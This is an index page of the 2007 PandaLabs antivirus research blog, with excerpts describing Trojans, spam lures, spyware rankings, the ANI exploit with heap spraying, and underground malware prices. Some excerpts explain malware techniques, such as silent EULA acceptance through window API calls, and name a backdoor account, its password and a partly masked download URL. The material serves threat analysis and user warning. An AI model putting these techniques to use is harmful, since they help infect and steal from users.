PandaLabs Blog

RSS Feed Homepage

Articles: 1, 2, 3, 4, 5, 6, 7

Quarterly Report January-March 2007
2007-05-07 13:12:00
We have just published the latest PandaLabs Quarterly Repo rt . We have introduced several improvements in the presentation of the statistics. Our goal has been to expand the information and facilitate interpretation so readers will have a more precise vision of the dimension and complexity of the current malware situation. Enjoy it!
More About: January , March , Marc

Fake Internet Explorer 7.0 Beta
2007-05-07 09:20:00
This weekend we have seen several spam messages sent in order to infect users with a new Trojan. It is being distributed as if it were an Internet Explorer 7.0 Beta update. This message is sent from a faked address, admin@microsoft.com, and the subject is "Internet Explorer 7.0 Beta". Once you open the message, you see the following picture: If you click on the image, a file named update.exe will be downloaded, which is the Trojan itself (detected as Trj/Spammer.AAO).
More About: Fake

Cybercrime... for sale (II)
2007-05-03 18:26:00
In this post, we continue talking about the price of malware, focusing on the price of software (Trojans, joiners, etc.):   Keylogger Teller 2.0: typical keylogger; it uses stealth techniques and is quite complete: US$40.   Webmoney Trojan: it captures Webmoney accounts: US$500, but the first 100 will obtain it for US$400!!!   WMT-spy: Another Trojan to obtain WebMoney accounts but quite cheaper than the previous one (its creator publishes the results it has obtained in virustotal): an executable US$5, updates US$5, the builder costs US$10.   Text translated from Russian using Google:     SNATCH TROJAN: We have already talked about this Trojan in a previous post. It steals passwords and has rootkit functionalities: US$600.   Limbo Trojan: I only mention the price, US$500. I have seen it in other sites on special offer for US$350. We will talk about this Trojan soon.   FTP checker: a program to validate stolen FTP accounts. You load the list ...
More About: For Sale , Sale , Cyber , Rime , Cybercrime

April spyware list
2007-04-27 13:43:00
This month, Adware/Gator gains the first position again, with only 75 more detections than Adware/Lop.1: Adware/Gator2: Adware/Lop3: Application/MyWebSearch4: Application/Winantivirus20065: Spyware /Virtumonde6: Adware/SaveNow Application/Winantivirus2006 moves 2 positions forward, from 6th to 4th position. This rogue antispyware is usually promoted by other adware or by banners included in websites that simulate a fake analysis of the system, which always finds threats. Then, we are requested to purchase for a modest price a program to remove them. Spyware/Virtumonde rises from the 9th to the 5th position. This malware is continually displaying banners belonging to rogue antispywares and error-repairing programs. Some versions also send information about the programs that the user has installed in the computer. They also download the toolbar Application/VSToolbar. In the 23rd position we find Adware/Spylocked, which is an adware that promotes Application/Spylocked. It is installed m...
More About: April , List

Not without my Eula!!!
2007-04-26 11:58:00
In a website that uses exploits to infect I have come across a malware that installs a program with the EULA agreement without user?s consent. Here you have a video in the following link or via YouTube: The process is shown: 1 ? Eula agreement ? How a user would install the program with the EULA agreement. 2 ? Without Eula agreement ? How the malware installs the program with the EULA agreement without user?s awareness. 3 ? Debugging ? The process followed by the malware to be installed: a) First, it drops a copy of the program with the EULA agreement, which is included in its code. b) Then, it runs it. c) It looks for some texts with the API function "FindWindow" in order to obtain the handlers of certain windows. d) Once it obtains the handlers, it hides the window using "ShowWindow", so that the infected user is hardly aware of what it?s being carried out. e) It sends the necessary messages using "SendMessage" to the previous handlers, faking the users acceptance&nb...

Cybercrime... for sale (I)
2007-04-23 17:23:00
You have probably wondered at some time or another why there is so much malware. As we have lately explained on so many occasions, most times it all comes down to money. However, this raises other questions: How do hackers make money out of programming malware? Where do they sell their creations? For how much? Who buys the malware? What for? Our investigation has taken a long time, not only due to the language barrier (the majority of this software and service sales in this sector ?the evil sector- comes from Russia and other countries in the area, which made us turn to our technicians in Russia and Ukraine for help), but also due to the many buy-and-sell forums out there and the great variety of products / services available. Some of the services on offer include: - DDoS attacks- Spam Hosting.- Hiding of executable files.- FTP accounts.- Mailing Lists.- ICQ numbers.- RapidShare accounts.- Online business accounts (mainly Russian).- Sale of Trojans.- Hiring of hackers? services. Fro...
More About: For Sale , Cyber , Rime , Cybercrime

W32/Spamta.WF.worm
2007-04-19 15:57:00
In the last hours we have received a few hundreds e-mails containing the worm Spamta.WF. The attached file has one of the following extensions: bat cmd exe pif scr The subject of the email is one of the following: Error Good Day hello Mail Delivery System Mail Transaction Failed picture Server Report Status test The worm is proactively detected by TruPrevent? Technologies.
More About: Worm

Artesimda.A
2007-04-18 11:58:00
Everyday we discover a huge number of new Trojans. Almost all of them are crimeware related (to steal any kind of credentials, e-mail addresses, etc.). It is common that the hackers, some of them really lazy, use different tools to carry out different actions instead of programming them within the code of the Trojan. This is good for us, as we can see suspicious behaviours when some services or tools are running. Today I'm going to talk about a new Trojan we have just been dealing with and that uses some Windows features in order to take control of the infected computer. The Trojan is named Trj/Artesimda.A, it creates a new account in Windows XP, whose user name is "Adminestrator" and the password is "Pass3488585".  This is what you would see in case you're infected: It uses a rootkit in order to hide itself and it starts the Remote Desktop Help Session Manager. As it steals different information (as the IP address) and has a local administrator user account ...

FakeImages
2007-04-16 10:44:00
I have just discovered a new kind of fakecodecs. This time, instead of being related with codecs to watch videos, it is related to images, I have named it Adware/Image AccesActiveXObject.  As well as with the fakecodecs, it offers us to "enjoy" some porn images by installing an ActiveX supposedly needed to whatch them. What it really does is to register a class Imageactivexobject.Ñhl that checks the web site we are visiting, so if we are on that particular website it redirects the browser to a different one where we could see the photos. This is part of the script where this is checked: In this case, when you click on the photos to watch them, it appears a message saying that the domain has expired. Here you have a video where we show the installation process. See the demo in the following video (It's encoded with XviD ) or via YouTube: As most of the fakecodecs, it checks if it is running on a virtual machine, in case it is it won?t infect the computer. All the malware ...
More About: Images , Ages

Ani exploit plus Heap Spraying
2007-04-13 14:40:00
Today we have detected a server exploting the last ani vulnerability with the known "Heap Spray ing" technique. The ani file exploits the vulnerability nevertheless there isn't a shellcode inside it:The html page has a javascript code to inject heap as much as possible until a valid memory become the return address to jump after the stack overflow, in this case 0x0B0B0B0B.The reason to use this technique instead include the shellcode inside the ani file should be to avoid the stack execution protection feature. By this way the shellcode is executed in the heap not in the stack, bypassing this protection. You can see the injected heap in the following image and the shellcode:
More About: Exploit , Plus , Pray

Nurech.Z
2007-04-13 13:33:00
In the last hours we have received several mails containing the worm Nurech.Z. In order to avoid being detected, this worm comes in a .zip file attached to the email. In addition, a password is needed to open that .zip, which makes its detection by the email filter even more complicated. Instead of being given in the body of the message, this password is included in a .gif file. However, it is not a very new technique as multiple variants of the Bagle have been using it for a long time. The subject of the email is varied, but it usually warns of the presence of malware in our PC. Some examples are: Virus Alert!Worm Alert!Spyware Alert! The worm is proactively detected by TruPrevent? Technologies. This is the image that appears in the .gif file:   The worm drops a couple of rootkits that will try to complicate our lives. The first one searches e-mail addresses in the computer, creates the image .GIF and, in addition, allows spam to be sent. The second hides the worm to make its...

Trojan Snatch installed in a lot of malware servers
2007-04-04 10:24:00
Lately, I?ve been coming across several websites that infect computers with the Trojan Trj/Snatch by using exploits. This malware not only monitors the passwords entered in the websites accessed by the user, but also has rootkit functionalities in order to remain hidden. As most of the malware kits that are for sale, it consists of a component that generates the server files with which it infects and of a web component, which is usually hosted in a server where it is indicated the websites to monitor and where it receives the information it harvests from the infected computers. The author of this malware can access via web in order to configure the data. This is the screen that is usually displayed in order to log in: These are the URLs that the Trojan is monitoring from 3 different servers: So you don't need to change the Trojan in order to update the entities that are being monitorized, just changing the URL you have it!  
More About: Servers , Malware , War , Ware

ANI vulnerability and malware researchers... be careful
2007-04-02 09:30:00
Last week (thursday and friday) was very hard for all malware researchers, working with the "new" ANI threat. Too much and different information were released. "Yes, it's the same MS05-002 issue", "No, it's not the same issue..." , "It 's a user32.dll fault, but probably it's only an Outlook and IE issue....". What is really true? We spent last Friday analyzing the vulnerability and no, it's not just an Outlook/IE issue. If you are a malware researcher (or not) and you usually use WinHex  you should be careful. The sample we were analyzing tried to download an executable (wincf.exe) from: http://22x.x.x.189/wincf.exe. By now the file has been deleted from the site however we changed the URL in order to see if the exploit works, and it really works great, fast and with WinHex.....What? Yes, we are not crazy. We were as surprised as you. See the demo in the following video (It's encoded with XViD [870k]) or via YouTube: It's time of WinHex's reverse engineer to disc...
More About: Research , Malware , Search , War , Ware

March Spyware list
2007-03-30 13:31:00
The six first positions of the March top ten are the same as the previous month: 1: Adware/Lop  2: Adware/Gator 3: Application/MyWebSearch  4: Adware/SaveNow  5: Adware/nCase6: Application/Winantivirus2006 The version of fakecodecs that is most extended currently, that is, Adware/VideoActiveXObject rises from the 8th to the 7th position. Spyware /Virtumonde rises from 17th to 9th position. This malware is continually displaying banners belonging to rogue antispywares and error-repairing programs. Some versions also send information about the programs that the user has installed in the computer. They also download the toolbar Application/VSToolbar, which is in 38th position. Adware/NaviPromo rises from 35th to 27th position. It is an adware that promotes dialers and uses rootkit functionalities in order to go unnoticed. Trj/Torpig.A gains the 37th position. The families belonging to Trj/Torpig and Trj/Sinowal are very similar. We explained the techniques used by Trj/Sin...
More About: War , Ware , List

A "new" ANI vulnerability in the wild
2007-03-30 08:50:00
It's real, it's not a "deja vù". Yesterday, March 29, a new 0-day exploit with the ANI file format was discovered in the wild. This vulnerability is due to the way Microsoft Windows handles the animated cursor. Microsoft has released an advisory.Affected systems include Win2k SP4, XP SP2, Server 2003 and Vista. Animated icons embedded in web page or emails can be used to exploit it, so be careful with emails received these days. Internet Explorer 7 in Vista with Protection Mode is protected from active exploitation, but Outlook is vulnerable.This vulnerability seems to be like the old ANI vulnerability (MS05-002), and probably exploits the same failure but with another technique. Microsoft released a patch for the old ANI vulnerability (MS05-002), but it didn't fix the underlying cause, leaving a way to exploit it again.
More About: Vulnerability , Wild , Bili

A fast and easy way to identify a system in a local network
2007-03-22 09:34:00
We know some tools and techniques to remote OS detection via TCP/IP Stack FingerPrinting: nmap, Queso, p0f,... These tools use advanced techniques to identify the OS of a remote system and they are really good. But sometimes we can use an easier method to identify the OS (only the OS: Linux, Windows,... not the version: XP, Vista, 2K, Debian, RedHat....) and only in our local network.A few days ago, I was developing a bash script to create directories with non-alphanumeric characters, to test the behaviour of Panda technologies with these non-usual directory names. Linux allow directory and file names with characters not allowed in Windows. If we try to use some  of these characters (*, ?, ") as a folder or file name in WIndows, we will get an error message:But Linux allows some of them:What happen if we have a shared folder in a Linux system (via Samba) and we map this as a network drive in our Windows? With explorer, cmd or cygwin shell it's not possible to create  a di...
More About: System , Work , Network , Local , Fast

Insecure features : should AV companies detect them?
2007-03-20 13:39:00
These days we have been analyzing one of the latest MySpace threats, JS/MySpace.A, which uses an interesting QuickTime feature : HREF Tracks. A deep analysis of this malware is avaliable at Didier Steven´s blog. Abusing HREF Tracks was firstly documented by pdp at GNUCITIZEN blog, later the MoAB project showed how to exploit them in conjunction with other vulnerabilities that allowed hackers to gain remote code execution. The end of the story is as follows: Apple has finally removed javascript support in QuickTime from version 7.1.5. But that´s not the end of it, I still remember a very similar case in which a feature became a vulnerability and we ended up adding generic detections for a legal and documented use of WMF file format, though I don't think anybody was really using it. So I wonder and I ask you: Should we add generic detections to file formats that support insecure features? If we do so, we may stop malware, but what can we say to a hypothetical cu...
More About: Companies , Features , Comp , Feature , Them

Sex in ASCII
2007-03-14 12:05:00
We have seen SPAM using ASCII ART in order to avoid being detected by antispam filters. Most of the times, they try to show different words (Viagra, etc.) using this technique, but this is the first time I have seen them showing a picture. It is not a very high quality one, but I?ve tried it with some different antispam filters and they have been fooled: This spam is just an invitation of one sex night friend and it is in Japanese, we have taken it from one of the spamtraps we have in Panda Research.
More About: Ascii

AntiVirus Trojan?
2007-03-10 02:51:04
We have seen rogue antispyware for quite a long time; there is a list of these kind of "programs" in the Spywarewarrior site. We have discovered something similar but this time its aim is not to earn money, but to bother users conscientiously. It has an installation wizard, as if it were a normal software program. However, when you install it, it performs the following actions: disables the Start button, the options Run and Find, the Control Panel, the Windows Updates, the context menus, the Notification area, the Task Manager, and it hides the watch, among other actions. It also runs Windows Pinball, the only "funny" thing it has. But don't get your hopes up, just after that, it restarts the computer... Finally, it also creates  a schedule task in order to restart the computer every three hours (it sleeps at night, as it is not executed from 0:00 to 6:00). You can download a video of this Trojan in action by clicking here. All the information abo...
More About: Virus , Antivirus , Anti , Roja

February Spyware List
2007-03-05 20:47:05
Today we are going to review our top spyware list. 1: Adware/Lop (Up from 2nd) 2: Adware/Gator (Down from 1st)3: Application/MyWebSearch (=) 4: Adware/SaveNow (Up from 7th) 5: Adware/nCase (Up from 6th) It is the first time that Adware/Gator has been ousted by other adware: Adware/Lop. As we explained in last month?s list, this adware, which belongs to C2Media LTD company, had obtained the second position in our ranking. The tenth position corresponds to Rootkit/Mhook, which is a rootkit mainly used by the Bagle family of worms in order to hide Bagle and to go unnoticed in the infected computers. This type of rootkits is being more and more used by spyware. In the fourteenth position is Trj/QQPass.JZ, which is a password stealer type Trojan that obtains passwords from the instant messaging program ?Tencent QQ?. It is worth mentioning that this program is very widespread in the Asian countries. Application/DriveCleaner gains two positions from last month?s seventeenth position to fi...
More About: Spyware , War , Ware , List , February

How to infect + 40.000 computers in 1 second?
2007-03-01 20:44:03
Yes, I know we should talk about how to protect computers, not about how to infect them, but... aren't you curious? We found a server managed by a hacker that controls more than 40.000 computers. Only yesterday, he created a new trojan and sent a command to all zombies: download & run. This is not the typical IRC botnet, but a http-based botnet, so the hacker won't find any problem if there is a firewall in the computer. It was just a downloader trojan that installed some malware in the infected computers: - A spammer trojan (hey, this guy has + 40.000 PCs ready to send out spam and flood all of us!) - An adware (Adware/Bravesentry) that change your desktop  to black and with big white letters saying that you are infected, and all the typical stuff. This adware intalls in the computer a rogue antispyware (Application/Bravesentry), a tool that is reporting all the time that you are infected until you purchase it. Once you buy it, it leaves you alone. Th...
More About: Computers , How To , Computer , Comp , Second

2006 PandaLabs Annual Report
2007-02-28 08:42:02
We have just published the brand new 2006 Panda Labs Annual Report , you can download it from here. Enjoy it!
More About: Port , Anda

A curious technique of social engineering
2007-02-23 08:38:06
We have recently detected many infections of Trj/Abox.A. This high number of infections is due to the curious technique of social engineering that it uses in order to deceive users. This malware sends email messages with an asx file attached. The code of the file can be recognized in the following tags:TITLE “Codec not found”, which deceives users into thinking that they have not the appropriate codec to watch the video.REF HREF, which is the URL of the video that is displayed. Actually, it is a one-minute long video with a black background, whose main purpose is to make users think that they do not have the suitable codec.MOREINFO HREF, which is the URL that is opened when the banner that appears in the video is clicked This is what users see when they try to open the file .asx:When users are infected, it downloads a downloader type Trojan (detected as Trj/Abox.A), which downloads via FTP 3 files that receive instructions from a server in order to send em...
More About: Social , Engineering , Curious , Tech , Technique

Malware, Banks & Google Maps (II)
2007-02-21 14:35:07
It seems that this hacker is pretty active, the Trojan tries to update itself, and then downloads some SSL v.2 crypted packages, which seem to be the message body and e-mail addresses. Today we have intercepted phishing being sent out, and right now it is sending spam. Can you guess what it is about? Yes, you are right, it's Viagra:We can find some text hidden in the e-mail in order to avoid antispam filters. The following text belongs to one of the messages:Korea's development of nuclear weapons.weapons programs and rejoin the international he standoff over North Korea's nuclear weaponsboycott.involving China, Japan, Russia, the two Koreas and theBush said the United States will remain a reliable partner in liberalizing trade, confronting North Korea's midterm elections to anti-war, anti-free trade in Singaporelaundering.Asia will not diminish.good of their people, is to abandon its nuclear The six-nation talks stalled a year ago when North weapons programs and...
More About: Google , Banks , Malware , War , Ware

Malware, Banks & Google Maps
2007-02-20 20:33:05
Yesterday, we detected a downloader that focused media attention because it was spammed using some "curious" subjects:# "Current Australia’s Prime Minister survived a hear attack"# "Prime Minister survived a heard attack"# "The life of the Prime Minister is in grave danger"There were a few thousand infections all around the world. It downloaded all kind of files, 6 of which were malware. Among them, there were a keylogger, a web server (it installs it on your computer in order to have a complete access to all your drives), 2 Trojans (to prevent the access to certain security and AntiVirus related web sites) and another 2 Trojans that redirect the traffic of some bank websites in order to steal information. It also used Google Maps in order to somehow locate the infected users. This may be useless but curious anyway. Now thanks to TruPrevent(R) proactive technologies, we have caught its small brother (it will be for sure a huge family in ...
More About: Banks , Malware , War , Ware

More fakecodecs!!!
2007-02-20 02:32:02
Lately we have noticed an increase in the detection of fake codecs. They are supposed to be codecs that allow users to watch certain videos, usually for adults, but in fact they only register a key in the computer in order to check if they had been previously installed. If so, not only they allow users to watch  these videos, but also install certain malware in the computer. As can be seen in the following video, one of these fake codecs installs malware in the computer in spite of not having accepted the EULA agreement. It can also be perceived how Adware/MegaTds, which is installed and uses rootkit techniques in order to go unnoticed, redirects the Internet searches to the websites that the adware wants to promote. This is one of the different ways used to earn money by means of malicious software (malware), what is known as crimeware. You can watch it here.
More About: Codecs , Code , More

MS deny the execution of IE7 if the executable file name isn't iexplore.exe
2007-02-16 02:30:01
Some days ago, while we were doing some of our research, we discovered a strange IE 7 behavior or "feature". We were trying to execute a renamed IE 7 executable, but we noticed that it was always ended without any system notification. After a basic debugging session of IE7, we discovered the code responsible for this action. The code was inside ieframe.dll for Windows XP: and iertutil.dll for Windows Vista (ieframe.dll in Vista has also some code to "detect" it: inside IsIexploreProcess function):  As can be seen in the disassembly, this code tries to match the executable name against some hardcoded values: iexplore.exe, explorer.exe and ieuser.exe (in XP) and iexplore.exe, ieuser.exe, ieinstall.exe and iedw.exe (in Vista). If the name doesn't match, the process will be killed. What’s the reason for this "feature"? After some research, we noticed this could be a feature derived from the inclusion of Protected Mode for Inte...
More About: File , Name , Tabl , Explore , Table

Wifi comments ( Update )
2007-02-14 14:28:02
We have received some comments, on our last post. There we said " 2.- Use encription WEP/WPA, something is better than nothing, although we know that this encription sistems can't stop an attack for more than 5 minutes, at least, you make it harder." What we mean is that WEP is very weak and that you should user WPA instead. A good password using WPA with AES is strong enough. We have corrected the previous post to make it clear that we were talking about WEP.  
More About: Men , Comments , Wifi , Update , Comment

Skype rumours
2007-02-09 14:25:02
Recently an article has been published, that suggests that Skype , the so famous VOIP client, may be collecting some information from the users PC. To be more specific, some details about the BIOS and the motherboard's serial numbe. Read it for full details.On the ASC, we have been working on some best practices guidelines for the industry, in order to draw a line that separates what should be allowed and what should't. This guidelines talk a lot about proper consent, which means that users should give explicit consent on what information is going to be gathered. Let's read the section about Consent and Control:"Users should be in control of their computers at all times. Anti-spyware vendors may evaluate the extent to which the software publisher has asked and received consent from the user before performing activities such as installation or uninstallation, or the collection, use or disclosure of personal information. For potentially unwanted technologies,...
More About: Rumour , Rumours

Wifi comments
2007-02-09 14:25:02
Not long ago, one of my colleagues told me a story which was quite funny. He was at home, and one of his neighbours, called him. He asked if he was having problems with his internet connection. My colleague told him, that everything was working for him, and that the only change he had done was changing the router's password. The other guy, asked him for the password, as he was unable to connect. After a quite funny conversation between them, my colleague learned that this guy had been using his Wifi connection for a long time, and more or less, he felt he had the right to use it, and blamed him for changing the password, preventing him from doing so.I was amazed with this story, so I decided to write a small guide.Tips on securing a Wifi network1.- Change the default password, it is amazing the number of devices which are still protected with the password provided on the manual, or something like, admin, administrator, password, etc, etc.2.- Use encription WEP/WPA...
More About: Men , Comments , Comment , Comm